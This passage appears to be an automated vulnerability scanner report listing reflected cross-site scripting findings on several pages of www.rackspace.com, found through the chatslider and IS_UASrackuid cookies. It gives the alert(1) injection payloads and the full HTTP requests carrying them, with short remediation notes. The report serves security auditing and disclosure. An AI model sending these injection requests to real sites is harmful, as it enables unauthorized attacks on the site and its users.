Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Da2a1c"%3balert(1)//051ba40c348; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19634"><script>alert(1)</script>e58abcce2fa was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/aboutus.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D19634"><script>alert(1)</script>e58abcce2fa; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5015"%3balert(1)//3eb3a6c915b was submitted in the IS_UASrackuid cookie. This input was echoed as d5015";alert(1)//3eb3a6c915b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/contactus.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8d5015"%3balert(1)//3eb3a6c915b; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88c34"><script>alert(1)</script>aed8f9fc615 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/contactus.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f888c34"><script>alert(1)</script>aed8f9fc615; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e61"><script>alert(1)</script>8c7903db26d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/contactus.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D51e61"><script>alert(1)</script>8c7903db26d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdcb9"%3balert(1)//cc702667c7a was submitted in the chatslider cookie. This input was echoed as bdcb9";alert(1)//cc702667c7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/contactus.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dbdcb9"%3balert(1)//cc702667c7a; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68909"%3balert(1)//1280d1ee247 was submitted in the IS_UASrackuid cookie. This input was echoed as 68909";alert(1)//1280d1ee247 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/briefingprogram.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f868909"%3balert(1)//1280d1ee247; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58de"><script>alert(1)</script>6ba59b20196 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/briefingprogram.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a58de"><script>alert(1)</script>6ba59b20196; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 184ff"%3balert(1)//21dcc59ce65 was submitted in the chatslider cookie. This input was echoed as 184ff";alert(1)//21dcc59ce65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/briefingprogram.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D184ff"%3balert(1)//21dcc59ce65; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ef7"><script>alert(1)</script>4f1788956fb was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/briefingprogram.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Db0ef7"><script>alert(1)</script>4f1788956fb; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2905"><script>alert(1)</script>a869f3f644 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/green.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8e2905"><script>alert(1)</script>a869f3f644; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 258be"%3balert(1)//23709ad9b87 was submitted in the IS_UASrackuid cookie. This input was echoed as 258be";alert(1)//23709ad9b87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/green.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8258be"%3balert(1)//23709ad9b87; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f745f"%3balert(1)//eb3ca469bbd was submitted in the chatslider cookie. This input was echoed as f745f";alert(1)//eb3ca469bbd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /information/events/green.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Df745f"%3balert(1)//eb3ca469bbd; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf545"><script>alert(1)</script>f7d4fbe9b3d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /information/events/green.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
